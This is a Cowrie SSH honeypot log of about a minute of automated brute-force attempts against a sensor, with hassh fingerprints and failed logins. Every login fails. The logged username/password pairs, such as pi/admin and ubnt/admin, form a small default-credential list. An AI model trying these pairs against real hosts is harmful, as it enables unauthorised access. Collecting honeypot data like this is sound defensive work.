{"eventid":"cowrie.login.failed","username":"noc","password":"12345678","message":"login attempt [noc/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.217100Z","src_ip":"212.227.125.160","session":"55cea6c29d07"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.403498Z","src_ip":"212.227.125.160","session":"7ee773c8c434"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:37.588389Z","src_ip":"212.227.125.160","session":"fffa28e096f9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.103052Z","src_ip":"212.227.125.160","session":"7f9e001f4940"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60238,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc97703c888d","protocol":"ssh","message":"New connection: 212.227.125.160:60238 (1.2.3.4:22) [session: bc97703c888d]","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.164052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.225447Z","src_ip":"212.227.125.160","session":"bc97703c888d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.226132Z","src_ip":"212.227.125.160","session":"bc97703c888d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.325647Z","src_ip":"212.227.125.160","session":"55cea6c29d07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60240,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d8a34d3a96","protocol":"ssh","message":"New connection: 212.227.125.160:60240 (1.2.3.4:22) [session: c2d8a34d3a96]","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.372312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.430373Z","src_ip":"212.227.125.160","session":"c2d8a34d3a96"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.430958Z","src_ip":"212.227.125.160","session":"c2d8a34d3a96"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.537178Z","src_ip":"212.227.125.160","session":"7ee773c8c434"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60246,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e117baeafd4","protocol":"ssh","message":"New connection: 212.227.125.160:60246 (1.2.3.4:22) [session: 0e117baeafd4]","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.586072Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"p@ssw0rd","message":"login attempt [ftpuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.629886Z","src_ip":"212.227.125.160","session":"bc97703c888d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.639737Z","src_ip":"212.227.125.160","session":"0e117baeafd4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.640533Z","src_ip":"212.227.125.160","session":"0e117baeafd4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.688976Z","src_ip":"212.227.125.160","session":"fffa28e096f9"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52748,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a4da0b5dcfe","protocol":"ssh","message":"New connection: 83.168.105.65:52748 (1.2.3.4:22) [session: 6a4da0b5dcfe]","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.722349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.723353Z","src_ip":"83.168.105.65","session":"6a4da0b5dcfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60250,"dst_ip":"1.2.3.4","dst_port":22,"session":"f54ed251cd06","protocol":"ssh","message":"New connection: 212.227.125.160:60250 (1.2.3.4:22) [session: f54ed251cd06]","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.745336Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.759356Z","src_ip":"83.168.105.65","session":"6a4da0b5dcfe"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.800306Z","src_ip":"212.227.125.160","session":"f54ed251cd06"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.800910Z","src_ip":"212.227.125.160","session":"f54ed251cd06"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.840086Z","src_ip":"212.227.125.160","session":"c2d8a34d3a96"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.869414Z","src_ip":"83.168.105.65","session":"6a4da0b5dcfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58344,"dst_ip":"1.2.3.4","dst_port":22,"session":"85cc6ec093ad","protocol":"ssh","message":"New connection: 212.227.125.160:58344 (1.2.3.4:22) [session: 85cc6ec093ad]","sensor":"my-vps","timestamp":"2025-08-26T11:33:38.962803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.008034Z","src_ip":"212.227.125.160","session":"85cc6ec093ad"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"p@ssw0rd","message":"login attempt [ubnt/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.048516Z","src_ip":"212.227.125.160","session":"0e117baeafd4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.177126Z","src_ip":"212.227.125.160","session":"85cc6ec093ad"}
{"eventid":"cowrie.login.failed","username":"pi","password":"p@ssw0rd","message":"login attempt [pi/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.196037Z","src_ip":"212.227.125.160","session":"f54ed251cd06"}
{"eventid":"cowrie.login.failed","username":"cseadmin","password":"cseadmin","message":"login attempt [cseadmin/cseadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.590738Z","src_ip":"212.227.125.160","session":"85cc6ec093ad"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.742565Z","src_ip":"212.227.125.160","session":"bc97703c888d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60256,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6e50205d428","protocol":"ssh","message":"New connection: 212.227.125.160:60256 (1.2.3.4:22) [session: f6e50205d428]","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.787904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.837867Z","src_ip":"212.227.125.160","session":"f6e50205d428"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.838600Z","src_ip":"212.227.125.160","session":"f6e50205d428"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.906976Z","src_ip":"83.168.105.65","session":"6a4da0b5dcfe"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.923314Z","src_ip":"212.227.125.160","session":"c2d8a34d3a96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60262,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0a1aa755b2b","protocol":"ssh","message":"New connection: 212.227.125.160:60262 (1.2.3.4:22) [session: b0a1aa755b2b]","sensor":"my-vps","timestamp":"2025-08-26T11:33:39.987909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.049135Z","src_ip":"212.227.125.160","session":"b0a1aa755b2b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.050257Z","src_ip":"212.227.125.160","session":"b0a1aa755b2b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.155109Z","src_ip":"212.227.125.160","session":"0e117baeafd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60270,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4da138f8193","protocol":"ssh","message":"New connection: 212.227.125.160:60270 (1.2.3.4:22) [session: c4da138f8193]","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.218476Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.230135Z","src_ip":"212.227.125.160","session":"f6e50205d428"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.269737Z","src_ip":"212.227.125.160","session":"c4da138f8193"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.270442Z","src_ip":"212.227.125.160","session":"c4da138f8193"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.283080Z","src_ip":"212.227.125.160","session":"f54ed251cd06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60278,"dst_ip":"1.2.3.4","dst_port":22,"session":"73014698b974","protocol":"ssh","message":"New connection: 212.227.125.160:60278 (1.2.3.4:22) [session: 73014698b974]","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.325355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.393091Z","src_ip":"212.227.125.160","session":"73014698b974"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.393738Z","src_ip":"212.227.125.160","session":"73014698b974"}
{"eventid":"cowrie.login.failed","username":"noc","password":"p@ssw0rd","message":"login attempt [noc/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.468932Z","src_ip":"212.227.125.160","session":"b0a1aa755b2b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:40.645489Z","src_ip":"212.227.125.160","session":"85cc6ec093ad"}
